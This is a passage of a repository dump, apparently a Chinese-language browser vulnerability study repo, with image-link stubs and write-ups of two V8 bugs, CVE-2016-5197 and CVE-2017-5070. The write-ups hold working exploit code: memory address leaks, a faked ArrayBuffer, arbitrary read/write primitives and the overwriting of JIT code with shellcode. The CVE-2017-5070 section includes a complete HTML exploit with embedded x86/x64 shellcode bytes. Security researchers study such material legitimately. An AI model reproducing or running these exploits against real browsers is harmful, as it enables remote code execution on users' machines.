--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2016-0189/CVE-2016-018911.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2016-0189/CVE-2016-018912.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2016-0189/CVE-2016-018912.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2016-0189/CVE-2016-018913.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2016-0189/CVE-2016-018913.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2016-0189/CVE-2016-018914.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2016-0189/CVE-2016-018914.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2016-0189/CVE-2016-01892.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2016-0189/CVE-2016-01892.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2016-0189/CVE-2016-01893.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2016-0189/CVE-2016-01893.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2016-0189/CVE-2016-01894.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2016-0189/CVE-2016-01894.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2016-0189/CVE-2016-01895.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2016-0189/CVE-2016-01895.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2016-0189/CVE-2016-01896.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2016-0189/CVE-2016-01896.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2016-0189/CVE-2016-01897.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2016-0189/CVE-2016-01897.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2016-0189/CVE-2016-01898.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2016-0189/CVE-2016-01898.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2016-0189/CVE-2016-01899.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2016-0189/CVE-2016-01899.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2016-5197.md:
--------------------------------------------------------------------------------
  1 | # CVE-2016-5197 OOB
  2 | 
  3 | ## 参考
  4 | https://xz.aliyun.com/t/2889#toc-17
  5 | https://www.jianshu.com/p/0326d382f5f9
  6 | https://cansecwest.com/slides/2017/CSW2017_QidanHe-GengmingLiu_Pwning_Nexus_of_Every_Pixel.pdf
  7 | 
  8 | 
  9 | ## 编译有问题的D8
 10 | https://bugs.chromium.org/p/chromium/issues/detail?id=659475
 11 | 
 12 | https://chromium.googlesource.com/v8/v8/+/2bd7464ec1efc9eb24a38f7400119a5f2257f6e6
 13 | 
 14 | ![](CVE-2016-5197/CVE-2016-51970.png)
 15 | 
 16 | ## 漏洞分析
 17 | ```
 18 | var n;
 19 | function Ctor() {
 20 |   n = new Set();
 21 | }
 22 | function Check() {
 23 |   n.xyz = 0x826852f4;
 24 | }
 25 | Ctor();
 26 | Ctor();
 27 | %OptimizeFunctionOnNextCall(Ctor);
 28 | Ctor();
 29 | Check();
 30 | Check();
 31 | %OptimizeFunctionOnNextCall(Check);
 32 | Check();
 33 | 
 34 | Ctor();
 35 | %DebugPrint(n);
 36 | Math.atan(1);
 37 | Check();
 38 | %DebugPrint(n);
 39 | Math.atan(1);
 40 | parseInt('AAAAAAAA');
 41 | ```
 42 | 
 43 | ![](CVE-2016-5197/CVE-2016-51971.png)
 44 | 
 45 | ![](CVE-2016-5197/CVE-2016-51972.png)
 46 | 
 47 | 
 48 | ## 漏洞利用
 49 | 
 50 | ### Leak ArrayBuffer ab地址，function evil_fun地址
 51 | ab是后续存shellcode的，evil_fun是一个自定义函数，我们希望修改function的CodeEntry为shellcode地址，从而控制EIP
 52 | 
 53 | ```
 54 | function evil_fun(a, b) {
 55 |     return a + b;
 56 | }
 57 | 
 58 | function Check(obj) {
 59 |    n.xyz = 3.4766863919152113e-308; // do not modify string map
 60 |    n.xyz1 = 0x0; // do not modify the value
 61 |    n.xyz2 = 0x7000; // enlarge length of builtIn string 'null'
 62 |    n.xyz3 = obj; // leak the Object 
 63 |    
 64 | }
 65 | Check(String(null));
 66 | Check(String(null));
 67 | %OptimizeFunctionOnNextCall(Check);
 68 | Check(String(null));
 69 | 
 70 | Ctor();
 71 | Check(ab);
 72 | ab_addr = read_value();
 73 | print("ArrayBuffer: " + ab_addr.toString(16));
 74 | 
 75 | Check(evil_fun);
 76 | var evil_fun_addr = read_value();
 77 | print("evil_fun: " + evil_fun_addr.toString(16));
 78 | ```
 79 | 
 80 | ![](CVE-2016-5197/CVE-2016-51973.png)
 81 | 
 82 | ![](CVE-2016-5197/CVE-2016-51974.png)
 83 | 
 84 | ### 将null string的地址写到其value处
 85 | 
 86 | ```
 87 | Check(String(null));
 88 | null_string_addr = read_value();
 89 | print("null string: " + null_string_addr.toString(16));
 90 | ```
 91 | 
 92 | ![](CVE-2016-5197/CVE-2016-51975.png)
 93 | 
 94 | ### 修改null string hashcode处为ab length的地址
 95 | 现在如果对xyz3赋值一个un-smi数, 它会把null_string_addr作为一个指针，实际操作的是null_string_addr指向的内存
 96 | 
 97 | 这里需要重新触发漏洞，我理解是之前n.xyz3赋值都是直接赋值，现在需要间接赋值，两者生成的优化后JIT Code不一样
 98 | ```
 99 | ab_len_addr = decode_from_float64(get_arraybuffer_length_addr(ab_addr));
100 | function Check2(addr){
101 |     m.xyz = 3.4766863919152113e-308;    
102 |     m.xyz1 = 0x0; 
103 |     m.xyz2 = 0x7000; 
104 |     m.xyz3 = addr; 
105 | 
106 | }
107 | Check2(ab_len_addr);
108 | Check2(ab_len_addr);
109 | %OptimizeFunctionOnNextCall(Check2);
110 | Check2(ab_len_addr);
111 | 
112 | Ctor();
113 | Check2(ab_len_addr);
114 | ```
115 | 
116 | ![](CVE-2016-5197/CVE-2016-51976.png)
117 | 
118 | ### 修改ab的backing store地址为evil_func地址
119 | 
120 | 经过上面一步，ab_len_addr位于null string hashcode处，对xy1赋值会把ab_len_addr当作一个指针，实际会写入[ab_len_addr+8],也就修改了ab的backing store地址
121 | 
122 | 同理，这里也需要重新触发漏洞
123 | 
124 | ```
125 | var temp = decode_from_float64(evil_fun_addr - 1);
126 | function Check3(addr){
127 |     l.xyz = 3.4766863919152113e-308;  
128 |     l.xyz1 = addr;             
129 | }
130 | 
131 | Check3(temp);
132 | Check3(temp);
133 | %OptimizeFunctionOnNextCall(Check3);
134 | Check3(temp);
135 | ```
136 | 
137 | ![](CVE-2016-5197/CVE-2016-51977.png)
138 | 
139 | 到了这一步，操作ab就等于操作evil_func! 通过ab，我们能读到evil_func的CodeEntry(第7个指针)
140 | 
141 | ```
142 | function get_codeEntry() {
143 |     if(platform == "x86") {
144 |         f64 = new Uint32Array(ab);
145 |         return decode_from_float64(f64[7]);
146 |     }
147 |     else {
148 |         f64 = new Float64Array(ab);
149 |         return f64[7];
150 |     }
151 |     
152 | }
153 | Ctor();
154 | Check3(temp);
155 | var shellcode_entry = get_codeEntry();
156 | ```
157 | 
158 | ### 修改ab的backing store地址为shellcode_entry
159 | ```
160 | Check3(shellcode_entry);
161 | ```
162 | 
163 | 
164 | ### 写入shellcode, call evil_func
165 | 通过上一步，操作ab就是修改evil_func的JIT Code; 我们将shellcode写入，再call evil_func
166 | 
167 | ```
168 | var shellcode = new Uint8Array(ab);
169 | for (var i=0, strLen=shellcode_str.length; i<strLen; i++) {
170 |     shellcode[i] = shellcode_str.charCodeAt(i);
171 | }
172 | 
173 | print(evil_fun(1,2));
174 | ```
175 | 
176 | ![](CVE-2016-5197/CVE-2016-51978.png)
177 | 
178 | ![](CVE-2016-5197/CVE-2016-51979.png)
179 | 
180 | Bingo!
181 | ![](CVE-2016-5197/CVE-2016-519710.png)


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2016-5197/CVE-2016-51970.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2016-5197/CVE-2016-51970.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2016-5197/CVE-2016-51971.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2016-5197/CVE-2016-51971.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2016-5197/CVE-2016-519710.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2016-5197/CVE-2016-519710.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2016-5197/CVE-2016-51972.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2016-5197/CVE-2016-51972.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2016-5197/CVE-2016-51973.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2016-5197/CVE-2016-51973.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2016-5197/CVE-2016-51974.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2016-5197/CVE-2016-51974.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2016-5197/CVE-2016-51975.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2016-5197/CVE-2016-51975.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2016-5197/CVE-2016-51976.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2016-5197/CVE-2016-51976.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2016-5197/CVE-2016-51977.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2016-5197/CVE-2016-51977.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2016-5197/CVE-2016-51978.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2016-5197/CVE-2016-51978.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2016-5197/CVE-2016-51979.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2016-5197/CVE-2016-51979.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2017-5070.md:
--------------------------------------------------------------------------------
  1 | # CVE-2017-5070 Type Confusion
  2 | 
  3 | ## 参考
  4 | 1. [POC Code](https://chromium.googlesource.com/v8/v8.git/+/e33fd30777f99a0d6e16b16d096a2663b1031457)
  5 | 2. [Exploit Code](https://bugs.chromium.org/p/chromium/issues/detail?id=722756)
  6 | 3. [有问题的V8](https://chromium.googlesource.com/v8/v8/+/5.8-lkgr)
  7 | 
  8 | ## Root Cause
  9 | ```
 10 | 
 11 | var array = [[{}], [1.1]];
 12 | var double_arr2 = [1.1,2.2];
 13 | function transition() {
 14 |   for(var i = 0; i < array.length; i++){
 15 |     var arr = array[i];
 16 |     arr[0] = {};
 17 |   }
 18 | 
 19 | }
 20 | 
 21 | var flag = 0;
 22 | function swap() {
 23 |   try {} catch(e) {}  // Prevent Crankshaft from inlining this.
 24 |   if (flag == 1) {
 25 |     array[1] = double_arr2;
 26 |   }
 27 | }
 28 | var expected = 6.176516726456e-312;
 29 | function f(){
 30 |   Math.sin(1);
 31 |   swap();  
 32 |   double_arr2[0] = 1;
 33 |   transition(); 
 34 |   double_arr2[1] = expected; 
 35 |   
 36 | }
 37 | %DebugPrint(double_arr2);
 38 | f();
 39 | %OptimizeFunctionOnNextCall(f);
 40 | flag = 1;
 41 | f();
 42 | 
 43 | print ("111");
 44 | print (expected === double_arr2[1]);
 45 | print ("222")
 46 | 
 47 | ```
 48 | 
 49 | 大致分析是double_arr2的map给修改, 引发类型混淆
 50 | 
 51 | 进一步确定root cause 
 52 | 
 53 | ![](CVE-2017-5070/CVE-2017-50700.png)
 54 | 
 55 | 什么情况下会触发修改map的call function呢？ 对应OPT Code 如下：
 56 | ![](CVE-2017-5070/CVE-2017-50701.png)
 57 | 
 58 | 所以，arr[0] = {}， double_arr2 由[1, 6.176516726456e-312] 变成了 [{}, 6.176516726456e-312], 触发了transition
 59 | 
 60 | ![](CVE-2017-5070/CVE-2017-50702.png)
 61 | 
 62 | 进一步,Crash原因
 63 | ![](CVE-2017-5070/CVE-2017-50703.png)
 64 | 
 65 | 
 66 | ## Exploit
 67 | 原本以为可以在Chrome上exploit成功，结果必须--no-sandbox模式下，故详细总结略。
 68 | 
 69 | 大致思路：
 70 | 
 71 | 1. 利用Type Confusion 讲Object混淆为Float，用于Leak Object地址； 
 72 | 
 73 | 2. Float混淆为Object，伪造一个fake arraybuffer
 74 | 
 75 | 3. 通过DataView 操作fake arraybuffer，读取function code entry地址，也可以修改code 内容为shellcode
 76 | 
 77 | 
 78 | ```
 79 | <html>
 80 | <script>
 81 |     //var shellcode = [0xcccccccc,0x90909090];
 82 |     
 83 |     var shellcode_dict = {
 84 |     "x86":"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
 85 |     +"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
 86 |     +"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
 87 |     +"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
 88 |     +"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
 89 |     +"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
 90 |     +"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
 91 |     +"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
 92 |     +"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
 93 |     +"\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f"
 94 |     +"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5"
 95 |     +"\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
 96 |     +"\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00", 
 97 |     "x64": "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
 98 |     +"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
 99 |     +"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
100 |     +"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
101 |     +"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
102 |     +"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
103 |     +"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
104 |     +"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
105 |     +"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
106 |     +"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
107 |     +"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
108 |     +"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
109 |     +"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
110 |     +"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
111 |     +"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
112 |     +"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
113 |     +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
114 |     +"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
115 |     +"\x63\x2e\x65\x78\x65\x00"};
116 | 
117 |     var shellcode_str = shellcode_dict["x64"];
118 |     var shellcode_buf = new ArrayBuffer(shellcode_str.length);
119 |     var shellcode = new Uint8Array(shellcode_buf);
120 |     for (var i=0, strLen=shellcode_str.length; i<strLen; i++) {
121 |         shellcode[i] = shellcode_str.charCodeAt(i);
122 |     }
123 | 
124 |     function d2u(num1,num2){
125 |         d = new Uint32Array(2);
126 |         d[0] = num2;
127 |         d[1] = num1;
128 |         f = new Float64Array(d.buffer);
129 |         return f[0];
130 |     }
131 |     
132 |     function encode_to_float64(num) {
133 |         f = new Float64Array(1);
134 |         f[0] = num;
135 |         d = new Uint32Array(f.buffer);
136 |         return d[1] * 0x100000000 + d[0];
137 |     }
138 |     
139 |     function change_to_float(intarr,floatarr){
140 |         var j = 0;
141 |         for(var i = 0;i < intarr.length;i = i+2){
142 |             var re = d2u(intarr[i+1],intarr[i]);
143 |             floatarr[j] = re;
144 |             j++;
145 |         }
146 |     }
147 |     
148 |     
149 | 
150 |     // 1. leak ArrayBuffer address
151 |     flag = 0;
152 |     var array = [[{}], [1.1]];  
153 |     var double_arr_2  = [1.1, 2.2]; 
154 |     var ab = new ArrayBuffer(0x20);
155 | 
156 |     function read_obj_addr(object){
157 |     
158 |         var valueOf1 = {};
159 |         valueOf1.valueOf = function(){
160 |             if(flag == 1){
161 |                 array[0x1] = double_arr_2;
162 |                 
163 |             }
164 |             return 1;
165 |         };
166 |         
167 |         function carry_me_plz(arr,obj){
168 |             for(var i = 0;i < arr.length;i++){
169 |                 var o = arr[i];
170 |                 o[0] = obj;
171 |             }
172 |         }
173 |         function sorry(){
174 |             1 + valueOf1;
175 |             double_arr_2[0] = 1.1;
176 |             carry_me_plz(array,object);
177 |             return double_arr_2[0];
178 |         }
179 | 
180 |         for(var i = 0;i < 0x1000;i++){
181 |             carry_me_plz(array,object);
182 |         }
183 |         for(var i = 0;i < 0x1000;i++){
184 |             sorry();
185 |         }
186 |         /*
187 |         carry_me_plz(array,object);
188 |         sorry();
189 |         %OptimizeFunctionOnNextCall(carry_me_plz);
190 |         %OptimizeFunctionOnNextCall(sorry);
191 |         */
192 |             
193 |         flag = 1;
194 |         re = encode_to_float64(sorry());
195 |         return re;
196 |     }       
197 |     ab_proto_addr = read_obj_addr(ab.__proto__);
198 |     //print("ab_proto_addr: 0x" + ab_proto_addr.toString(0x10));
199 |     ab_constructor_addr = ab_proto_addr - 0x70;
200 |     
201 | 
202 |     
203 |     var nop = 0xdaba0000;
204 |     var ab_map_obj = [
205 |         nop,nop,
206 |         0x1f000008,0x000900c0,0x082003ff,0x0,
207 |         nop,nop,   // use ut32.prototype replace it
208 |         nop,nop,0x0,0x0
209 |     ];
210 |     
211 |     ab_map_obj[0x6] = ab_proto_addr & 0xffffffff;
212 |     ab_map_obj[0x7] = ab_proto_addr / 0x100000000;
213 |     ab_map_obj[0x8] = ab_constructor_addr & 0xffffffff;
214 |     ab_map_obj[0x9] = ab_constructor_addr / 0x100000000;
215 |     float_arr = [];
216 | 
217 | 
218 |     var ab_map_obj_float = [1.1,1.1,1.1,1.1,1.1,1.1];
219 |     change_to_float(ab_map_obj,ab_map_obj_float);
220 |         
221 |     flag = 0;
222 |     var array2 = [[{}], [1.1]]; 
223 |     var double_arr22  = [1.1, 2.2]; 
224 |     
225 |     var valueOf2 = {};
226 |     valueOf2.valueOf = function(){
227 |         if(flag == 1){
228 |             array2[0x1] = double_arr22;
229 |             
230 |         }
231 |         return 1;
232 |     };
233 |     function read_obj_addr2(object){
234 |         function carry_me_plz(arr,obj){
235 |             for(var i = 0;i < arr.length;i++){
236 |                 var o = arr[i];
237 |                 o[0] = obj;
238 |             }
239 |         }
240 |         function sorry(){
241 |             1 + valueOf2;
242 |             double_arr22[0] = 1.1;
243 |             carry_me_plz(array2,object);
244 |             return double_arr22[0];
245 |         }
246 |       
247 |         for(var i = 0;i < 0x1000;i++){
248 |             carry_me_plz(array2,object);
249 |         }
250 |         for(var i = 0;i < 0x1000;i++){
251 |             sorry();
252 |         }
253 |         /*
254 |         carry_me_plz(array2,object);
255 |         sorry();
256 |         %OptimizeFunctionOnNextCall(carry_me_plz);
257 |         %OptimizeFunctionOnNextCall(sorry);
258 |         */
259 |        
260 |         flag = 1;
261 |         re = encode_to_float64(sorry());
262 |         return re;
263 |     }
264 |     ab_map_obj_addr = read_obj_addr2(ab_map_obj_float) + 0x40;  
265 |     //print("ab_map_obj_addr: 0x" + ab_map_obj_addr.toString(0x10));
266 |     //Math.sin(1);
267 |     
268 |     
269 |     /////////////////////////////          3           //////////////////////////
270 |     
271 |     var fake_ab = [
272 |         ab_map_obj_addr & 0xffffffff, ab_map_obj_addr / 0x100000000,
273 |         ab_map_obj_addr & 0xffffffff, ab_map_obj_addr / 0x100000000,
274 |         ab_map_obj_addr & 0xffffffff, ab_map_obj_addr / 0x100000000,
275 |         0x0,0x4000, // buffer length 
276 |         0x12345678,0x123,// buffer address
277 |         0x4,0x0
278 |     ]
279 |     var fake_ab_float = [1.1,1.1,1.1,1.1,1.1,1.1];
280 |     change_to_float(fake_ab,fake_ab_float);
281 |     
282 |     flag = 0;
283 |     var array3 = [[{}], [1.1]]; 
284 |     var double_arr32  = [1.1, 2.2]; 
285 |     
286 |     var valueOf3 = {};
287 |     valueOf3.valueOf = function(){
288 |         if(flag == 1){
289 |             array3[0x1] = double_arr32;
290 |             
291 |         }
292 |         return 1;
293 |     };
294 |     function read_obj_addr3(object){
295 |         function carry_me_plz(arr,obj){
296 |             for(var i = 0;i < arr.length;i++){
297 |                 var o = arr[i];
298 |                 o[0] = obj;
299 |             }
300 |         }
301 |         function sorry(){
302 |             1 + valueOf3;
303 |             double_arr32[0] = 1.1;
304 |             carry_me_plz(array3,object);
305 |             return double_arr32[0];
306 |         }
307 | 
308 |         for(var i = 0;i < 0x1000;i++){
309 |             carry_me_plz(array3,object);
310 |         }
311 |         for(var i = 0;i < 0x1000;i++){
312 |             sorry();
313 |         }           
314 |         /*
315 |         carry_me_plz(array3,object);
316 |         sorry();
317 |         
318 |         %OptimizeFunctionOnNextCall(carry_me_plz);
319 |         %OptimizeFunctionOnNextCall(sorry);
320 |         */
321 |         flag = 1;
322 |         re = encode_to_float64(sorry());
323 |         return re;
324 |     }
325 |     fake_ab_float_addr = read_obj_addr3(fake_ab_float) + 0x40;
326 |     //print("fake_ab_float_addr: 0x" + fake_ab_float_addr.toString(0x10));
327 |     Math.sin(1);
328 |     
329 |     
330 |     flag = 0;
331 |     var array4 = [[{}], [1.1]]; 
332 |     var double_arr42  = [1.1, 2.2]; 
333 |     
334 |     var valueOf4 = {};
335 |     valueOf4.valueOf = function(){
336 |         if(flag == 1){
337 |             array4[0x1] = double_arr42;
338 |             
339 |         }
340 |         return 1;
341 |     };
342 |     fake_ab_float_addr_f = d2u(fake_ab_float_addr / 0x100000000,fake_ab_float_addr & 0xffffffff);
343 |     function carry_me_plz_fake(arr){
344 |         for(var i = 0;i < arr.length;i++){
345 |             var o = arr[i];
346 |             ttt = o[0];
347 |         }
348 |     }
349 |     function sorry_fake(){
350 |         1 + valueOf4;
351 |         double_arr42[0] = 1.1;
352 |         carry_me_plz_fake(array4);
353 |         double_arr42[1] = fake_ab_float_addr_f
354 |     }
355 |     
356 |     for(var i = 0;i < 0x1000;i++){
357 |         carry_me_plz_fake(array4);
358 |     }
359 |     for(var i = 0;i < 0x1000;i++){
360 |         sorry_fake();
361 |     }
362 |     flag = 1;
363 |     sorry_fake();
364 |     fake_arraybuffer = double_arr42[1];
365 |     fake_dv = new DataView(fake_arraybuffer,0,0x4000);
366 |     
367 |     
368 |     
369 |     
370 |     var function_to_shellcode = function () {
371 |         eval('');
372 |     }
373 | 
374 |     flag = 0;
375 |     var array5 = [[{}], [1.1]]; 
376 |     var double_arr52  = [1.1, 2.2]; 
377 |     
378 |     var valueOf5 = {};
379 |     valueOf5.valueOf = function(){
380 |         if(flag == 1){
381 |             array5[0x1] = double_arr52;
382 |             
383 |         }
384 |         return 1;
385 |     };
386 |     function read_obj_addr5(object){
387 |         function carry_me_plz(arr,obj){
388 |             for(var i = 0;i < arr.length;i++){
389 |                 var o = arr[i];
390 |                 o[0] = obj;
391 |             }
392 |         }
393 |         function sorry(){
394 |             1 + valueOf5;
395 |             double_arr52[0] = 1.1;
396 |             carry_me_plz(array5,object);
397 |             return double_arr52[0];
398 |         }
399 |         for(var i = 0;i < 0x1000;i++){
400 |             carry_me_plz(array5,object);
401 |         }
402 |         for(var i = 0;i < 0x1000;i++){
403 |             sorry();
404 |         }
405 |         flag = 1;
406 |         re = encode_to_float64(sorry());
407 |         return re;
408 |     }
409 |     shellcode_address_ref = read_obj_addr5(function_to_shellcode) + 0x38-1;
410 |     //print("shellcode_address_ref: 0x" + shellcode_address_ref.toString(0x10));
411 |     
412 |     
413 |         /**************************************  And now,we get arbitrary memory read write!!!!!!   ******************************************/
414 |     
415 |     function Read32(addr){
416 |         fake_ab_float[4] = d2u(addr / 0x100000000,addr & 0xffffffff);
417 |         return fake_dv.getUint32(0,true);
418 |     }
419 |     function Write32(addr,value){
420 |         fake_ab_float[4] = d2u(addr / 0x100000000,addr & 0xffffffff);   
421 |         fake_dv.setUint32(0,value,true);
422 |     }
423 | 
424 |     shellcode_address = Read32(shellcode_address_ref) + Read32(shellcode_address_ref+0x4) * 0x100000000;;
425 | 
426 |     var addr = shellcode_address;
427 |     
428 |     fake_ab_float[4] = d2u(addr / 0x100000000,addr & 0xffffffff);
429 |     for(var i = 0; i < shellcode.length;i++){
430 |         var value = shellcode[i];       
431 |         fake_dv.setUint8(i,value,true);
432 |     }
433 | 
434 |     function_to_shellcode();
435 | </script>
436 | </html> 
437 | ```
438 | 
439 | 
440 | ![](CVE-2017-5070/CVE-2017-50704.png)


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2017-5070/CVE-2017-50700.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2017-5070/CVE-2017-50700.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2017-5070/CVE-2017-50701.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2017-5070/CVE-2017-50701.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2017-5070/CVE-2017-50702.png:
--------------------------------------------------------------------------------
